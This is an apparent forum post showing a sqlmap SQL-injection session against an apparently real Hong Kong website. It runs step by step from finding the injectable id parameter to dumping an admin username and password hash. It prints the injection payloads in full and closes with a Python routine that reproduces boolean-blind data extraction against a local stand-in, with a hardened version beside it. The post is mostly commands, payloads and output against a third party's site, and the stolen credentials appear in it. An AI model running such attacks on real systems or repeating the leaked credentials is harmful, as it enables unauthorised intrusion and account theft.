sqlmap example: injecting a MySQL back end

Posted by the thread starter on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: fetch the current database user

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* list the tables in the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* dump the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
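The session above shows sqlmap's results but not the mechanics behind them. The following is an added example, not code from the original post or from sqlmap, that reproduces the boolean-based blind technique sqlmap reported (the `id=276 AND 799=799` test) against a constructed stand-in and decodes the `CHAR()` markers in the error-based and UNION payloads. It assumes an in-memory sqlite3 database in place of MySQL (so sqlite's `unicode()`/`substr()` stand in for MySQL's `ASCII()`/`SUBSTRING()`), an `article`/`admin` schema mirroring the column listing in the post, and a hypothetical `VulnerableTarget.page()` that imitates an article.php concatenating `id` into its query; `safe_page()` is the same lookup with the parameter bound instead.

```python
import re
import sqlite3


# Constructed stand-in for the post's 'wepost' database: sqlite3 in memory instead of
# MySQL, with the admin columns the --columns run listed and the dumped userid/hash.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin(id INTEGER PRIMARY KEY, password TEXT, type TEXT, userid TEXT);
        INSERT INTO article VALUES (276, 'Issue 12 editorial');
        INSERT INTO admin VALUES (1, '7d4d7589db8b28e04db0982dd0e92189', 'super', 'wepost2010');
    """)
    return db


class VulnerableTarget:
    """Hypothetical article.php: the id parameter is pasted straight into the SQL
    string, which is the defect that lets 'id=276 AND 799=799' execute as SQL."""

    def __init__(self):
        self.db = build_db()
        self.requests = 0  # stands in for the HTTP request count

    def page(self, id_param):
        self.requests += 1
        sql = "SELECT title FROM article WHERE id=" + id_param
        try:
            row = self.db.execute(sql).fetchone()
        except sqlite3.Error:
            return ""  # the application would render an error or empty page
        return row[0] if row else ""


def safe_page(db, id_param):
    """Hardened form: the id is validated and bound, so the same input is never SQL."""
    if not id_param.isdigit():
        return ""
    row = db.execute("SELECT title FROM article WHERE id=?", (int(id_param),)).fetchone()
    return row[0] if row else ""


def boolean_oracle(target, condition):
    """The boolean-based blind primitive: does the article still render when
    <condition> is ANDed onto the original WHERE clause?"""
    return target.page("276 AND (" + condition + ")") != ""


def blind_extract(target, subquery, max_len=64):
    """Recover the result of <subquery> through the oracle alone, bisecting the
    7-bit code of each character: one length probe plus 7 oracle calls per character."""
    out = []
    for pos in range(1, max_len + 1):
        if not boolean_oracle(target, f"length(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # MySQL equivalent: ASCII(SUBSTRING((subquery),pos,1)) > mid
            if boolean_oracle(target, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


_CHAR_CALL = re.compile(r"CHAR\(([\d,]+)\)")


def decode_char_calls(payload):
    """Rewrite every CHAR(n,n,...) in a sqlmap payload as the literal it builds; this
    exposes the :cvx: / :ncv: delimiters sqlmap uses to locate its output in the page."""
    return _CHAR_CALL.sub(
        lambda m: "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'",
        payload,
    )


if __name__ == "__main__":
    t = VulnerableTarget()
    print(boolean_oracle(t, "799=799"), boolean_oracle(t, "799=798"))
    print(blind_extract(t, "SELECT password FROM admin LIMIT 1"), t.requests)
    print(safe_page(t.db, "276 AND 799=799") == "")
    print(decode_char_calls("CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,"
                            "105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58))"))
```

Pulling the 32-character hash out through the oracle costs 257 page loads (32 × 8 plus the final length probe), which is why sqlmap prefers the UNION and error-based channels when it has them and only falls back to boolean or time-based blind when it must. The decoded UNION payload reads `CONCAT(':cvx:',IFNULL(CAST('OLeUVieYmA' AS CHAR),' '),':ncv:')`: sqlmap injects a random string between two fixed markers and looks for it in the response to confirm which of the ten NULL columns is reflected.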